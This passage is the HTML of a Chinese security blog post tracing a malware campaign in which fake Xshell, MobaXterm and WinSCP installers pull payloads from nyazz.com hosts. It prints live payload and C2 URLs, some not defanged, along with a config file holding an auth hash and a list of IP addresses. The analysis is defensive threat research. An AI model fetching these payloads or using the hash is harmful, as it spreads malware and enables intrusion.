src="https://wechat2rss.xlab.app/img-proxy/?k=db610256&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY91MTkLgCEpLNVOZjZ3DvWVibvWTDu1W8MVJ8dDS45vibVSEDEucXLRuOQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">在 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">www.7zei[.]com</span></code><span leaf=""> 下载的 Xshell7.rar 当中的 MobaXterm_Personal_24.2.exe 请求下载了 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf=""><a href="https://scrt1.nyazz.com/MobServe.exe" target="_blank">https://scrt1.nyazz.com/MobServe.exe</a></span></code><span leaf="">。</span></p><p><img data-imgfileid="100001493" class="rich_pages wxw-img" data-ratio="0.5974276527331189" data-s="300,640" data-type="png" data-w="3110" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=8c5438c9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9ucZroZIicicTDOvyn0LOLatJSy61GMKpYXAcQmsczXw3Rv2bz08cCv1A%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">scrt1.nyazz[.]com</span></code><span leaf=""> 当前解析到 118.107.29.172，不久前解析过 216.83.52.155、 216.83.52.145，这三个 IP 都很有说法。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">118.107.29.172 的端口开放情况：</span></p><p><img data-imgfileid="100001490" class="rich_pages wxw-img" data-ratio="0.2297447280799112" data-s="300,640" data-type="png" data-w="1802" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=7bb0a93c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9nTO4PPhpODj5nbAPyb7syLEzn9huic8EAdXlZlK15SqvgoIIpYYXiaUQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">又扫到了 config.ini  </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf=""><a href="https://scrt1.nyazz[.]com/config.ini" target="_blank">https://scrt1.nyazz[.]com/config.ini</a></span></code><span leaf=""> ，内容应该是跟之前一样的无意义内容（现在也被删了）。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">还扫到了一个 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf=""><a href="https://scrt1.nyazz[.]com/error_log.txt" target="_blank">https://scrt1.nyazz[.]com/error_log.txt</a></span></code><span leaf=""> ，看上去很像是用来记录 C2 报错的错误日志（现在竟然也被删了）。</span></p><p><img data-imgfileid="100001491" class="rich_pages wxw-img" data-ratio="1.1393188854489165" data-s="300,640" data-type="png" data-w="1292" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=7c645dc5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9Ty5OduJX3Zgicgj4gqkTaLicX1QfvWgVoqqVoZibO0WA444mdnQtib50Bg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">最早的时间是10月8号，实际上综合观察本次事件溯源所有的样本来看，10月1号到10月11号左右是一个样本创建和曝光的小高峰期。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">我对错误日志中的IP进行了简单的分析，总结下来应该都是出口IP，排在第一个的泰国 IP 就很让人寻味了。</span></p><pre data-tool="mdnice编辑器" style="border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;text-align: left;margin-top: 10px;margin-bottom: 10px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;"><span data-cacheurl="" data-remoteid="" style="display: block;background: none;height: 30px;width: 100%;background-size: 40px;background-repeat: no-repeat;background-color: #282c34;margin-bottom: -7px;border-radius: 5px;background-position: 10px 10px;background-image: url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/b2ONlmmVZRpfBHZoR6HeLaxQg28syricuPlESviaevSocicBW323HF5sUahR7ia7W3SOicWjE4an2rZLhrjyxmflThmG0h9WAshQib/640?wx_fmt=svg&amp;from=appmsg&#34;);"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;padding-top: 15px;background: #282c34;border-radius: 5px;display: -webkit-box;font-family: Consolas, Monaco, Menlo, monospace;font-size: 12px;"><span leaf="">-- IP --    -- IP的物理位置 --</span><span leaf=""><br/></span><span leaf="">49.228.99.98    泰国佛统 ais     //排在第一个，唯一一个境外IP</span><span leaf=""><br/></span><span leaf="">58.33.201.244   中国上海上海 电信</span><span leaf=""><br/></span><span leaf="">119.1.234.236  中国贵州毕节黔西 电信  //XX市人民医院？</span><span leaf=""><br/></span><span leaf="">183.14.135.27  中国广东深圳南山 电信</span><span leaf=""><br/></span><span leaf="">124.128.246.58  中国山东济南历城 联通  //XXXX网络科技有限公司</span><span leaf=""><br/></span><span leaf="">58.250.250.178  中国广东深圳南山 联通</span><span leaf=""><br/></span><span leaf="">59.70.63.22   中国河南郑州 教育网</span><span leaf=""><br/></span><span leaf="">59.70.63.11   中国河南郑州 教育网</span><span leaf=""><br/></span><span leaf="">115.150.114.40  中国江西赣州章贡 电信</span><span leaf=""><br/></span><span leaf="">27.218.218.144  中国山东临沂兰山 联通</span><span leaf=""><br/></span><span leaf="">39.144.95.104  中国山西太原 移动</span><span leaf=""><br/></span><span leaf="">218.17.162.213  中国广东深圳南山 电信</span><span leaf=""><br/></span></code></pre><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">后来我又扫到了 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf=""><a href="https://scrt1.nyazz[.]com/error.php" target="_blank">https://scrt1.nyazz[.]com/error.php</a></span></code><span leaf=""> （现在也被删了，至少12月11日还是在的）。</span></p><p><img data-imgfileid="100001492" class="rich_pages wxw-img" data-ratio="0.2851182197496523" data-s="300,640" data-type="png" data-w="1438" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=18752f20&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9AZm5Wg9u38gZMywOt6lkVrm4LstiaerGAd5e0Wkhol6RIVC21ianqn2Q%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">猜了半天没猜到错误码的参数，但是每 POST 一次，IP 就会被记录在 error_log.txt 里，也是有个默认错误码的，具体是啥忘了。</span></p><p><img data-imgfileid="100001494" class="rich_pages wxw-img" data-ratio="0.38752488387524886" data-s="300,640" data-type="png" data-w="3014" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=f196c0b4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9JXr8AWDE8vLwKEf3PmTmLpElxlnmVAicUpXdSSED1RWYhznj7NiaV9CQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">继续信息搜集还发现了子域名 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf=""><a href="http://winscp.nyazz[.]com/" target="_blank">http://winscp.nyazz[.]com/</a></span></code><span leaf=""> ，假冒 WinScp 下载地址 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf=""><a href="http://winscp.nyazz.com/WinSCP-6.3.zip" target="_blank">http://winscp.nyazz.com/WinSCP-6.3.zip</a></span></code><span leaf=""> 。</span></p><p><img data-imgfileid="100001495" class="rich_pages wxw-img" data-ratio="0.9530132788559755" data-s="300,640" data-type="png" data-w="1958" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=835c6415&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9umU3kDtgIiauzCDaSeKibGMfhqsgkYlBnwniaSiaG9InRnHcL7NMhtGia4Q%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">还有正宗的假冒MobaxTerm </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf=""><a href="https://mb.nyazz.com/" target="_blank">https://mb.nyazz.com/</a></span></code><span leaf=""> ，下载地址 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf=""><a href="https://mb.nyazz.com/download.php" target="_blank">https://mb.nyazz.com/download.php</a></span></code><span leaf=""> 。</span></p><p><img data-imgfileid="100001497" class="rich_pages wxw-img" data-ratio="0.4580818242790074" data-s="300,640" data-type="png" data-w="2982" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=4565ff77&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY96OHFWgIeH41Az68iaZPc1V9SIuzuM4azbc1BOTKGhKkmUZxcibFFju6w%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">这个站的证书报错又能关联出来一个新域名：</span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">mob.edvdfh.cn, ssh.0523qyfw.com</span></code></p><p><img data-imgfileid="100001496" class="rich_pages wxw-img" data-ratio="0.14702154626108999" data-s="300,640" data-type="png" data-w="1578" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=be72ef68&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9MYQuzXPiaVJfrAjDXYLq41ibcLjtYvjFjrFyDFHFfbbFSZ1xKysUDItQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">而这个有内容的 config.ini 就很有意思了 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf=""><a href="https://mb.nyazz.com/config.ini" target="_blank">https://mb.nyazz.com/config.ini</a></span></code><span leaf=""> ，其中包含一个 clientId。</span></p><pre data-tool="mdnice编辑器" style="border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;text-align: left;margin-top: 10px;margin-bottom: 10px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;"><span data-cacheurl="" data-remoteid="" style="display: block;background: none;height: 30px;width: 100%;background-size: 40px;background-repeat: no-repeat;background-color: #282c34;margin-bottom: -7px;border-radius: 5px;background-position: 10px 10px;background-image: url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/b2ONlmmVZRpfBHZoR6HeLaxQg28syricuPlESviaevSocicBW323HF5sUahR7ia7W3SOicWjE4an2rZLhrjyxmflThmG0h9WAshQib/640?wx_fmt=svg&amp;from=appmsg&#34;);"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;padding-top: 15px;background: #282c34;border-radius: 5px;display: -webkit-box;font-family: Consolas, Monaco, Menlo, monospace;font-size: 12px;"><span leaf="">[ConfigInfo]</span><span leaf=""><br/></span><span leaf="">passUpdate=0</span><span leaf=""><br/></span><span leaf=""><br/></span><span leaf="">LastPushTimeEx=20240926</span><span leaf=""><br/></span><span leaf="">isUpdate=1</span><span leaf=""><br/></span><span leaf="">updatePassTime=20240926093118</span><span leaf=""><br/></span><span leaf="">downloadtimes=202409260</span><span leaf=""><br/></span><span leaf="">PluginExpiresDays=0</span><span leaf=""><br/></span><span leaf="">Resolution=1920x1080</span><span leaf=""><br/></span><span leaf="">isOpenTempPass=1</span><span leaf=""><br/></span><span leaf="">language=936</span><span leaf=""><br/></span><span leaf="">isAdmissionControl=1</span><span leaf=""><br/></span><span leaf="">WeakPasswordTip=0</span><span leaf=""><br/></span><span leaf="">Version=4.7.4.3</span><span leaf=""><br/></span><span leaf="">clientId=567177890</span><span leaf=""><br/></span><span leaf="">tempAuthPassEx=e875391d1569a20f9a8441a96f1952228f07427087ef672194a575c9c06c86db3744cb1c2dc863ba211870fc3b559c7cca6eb6c41bfb860d</span><span leaf=""><br/></span><span leaf="">PresetDialogUpdateDate=2024-09-26</span><span leaf=""><br/></span><span leaf="">PresetDialogShowCount=0</span><span leaf=""><br/></span></code></pre><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">还能够扫到一个 shell 文件 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf=""><a href="https://mb.nyazz[.]com/shell" target="_blank">https://mb.nyazz[.]com/shell</a></span></code><span leaf=""> ，内容并不直接是乱码，不知道是否是 base64 编码后的 shellcode，这次事件中第一次看到这个格式。</span></p><pre data-tool="mdnice编辑器" style="border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;text-align: left;margin-top: 10px;margin-bottom: 10px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;"><span data-cacheurl="" data-remoteid="" style="display: block;background: none;height: 30px;width: 100%;background-size: 40px;background-repeat: no-repeat;background-color: #282c34;margin-bottom: -7px;border-radius: 5px;background-position: 10px 10px;background-image: url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/b2ONlmmVZRpfBHZoR6HeLaxQg28syricuPlESviaevSocicBW323HF5sUahR7ia7W3SOicWjE4an2rZLhrjyxmflThmG0h9WAshQib/640?wx_fmt=svg&amp;from=appmsg&#34;);"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;padding-top: 15px;background: #282c34;border-radius: 5px;display: -webkit-box;font-family: Consolas, Monaco, Menlo, monospace;font-size: 12px;"><span 